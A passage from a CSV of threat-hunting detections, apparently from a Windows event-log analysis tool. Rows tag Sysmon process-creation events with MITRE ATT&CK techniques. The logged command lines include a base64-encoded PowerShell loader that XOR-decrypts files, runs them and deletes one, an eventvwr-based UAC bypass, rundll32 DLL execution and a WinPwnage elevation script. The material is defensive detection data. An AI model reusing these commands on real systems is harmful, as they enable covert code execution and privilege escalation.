<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
</TimeCreated>
<EventRecordID>11116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
<Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
</TimeCreated>
<EventRecordID>424115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ProcessId"">9116</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ParentProcessId"">7552</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.034674Z"">
</TimeCreated>
<EventRecordID>5976</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.994</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001032DBFF00</Data>
<Data Name=""ProcessId"">1900</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
</TimeCreated>
<EventRecordID>11116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
<Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
</TimeCreated>
<EventRecordID>11116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
<Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:43.990983Z"">
</TimeCreated>
<EventRecordID>6171</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:43.969</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
<Data Name=""ProcessId"">1536</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:43.990983Z"">
</TimeCreated>
<EventRecordID>6171</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:43.969</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
<Data Name=""ProcessId"">1536</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /run /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:35.258262Z"">
</TimeCreated>
<EventRecordID>16245</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:35.070</Data>
<Data Name=""ProcessGuid"">365ABB72-69A3-5CD7-0000-0010306F2200</Data>
<Data Name=""ProcessId"">3752</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /run /tn elevator</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
<Data Name=""LogonId"">0x1384a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
<Data Name=""ParentProcessId"">2740</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:03.589507Z"">
</TimeCreated>
<EventRecordID>16451</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:03.558</Data>
<Data Name=""ProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ProcessId"">3320</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-252D-5CD8-0000-001019E20300</Data>
<Data Name=""ParentProcessId"">2800</Data>
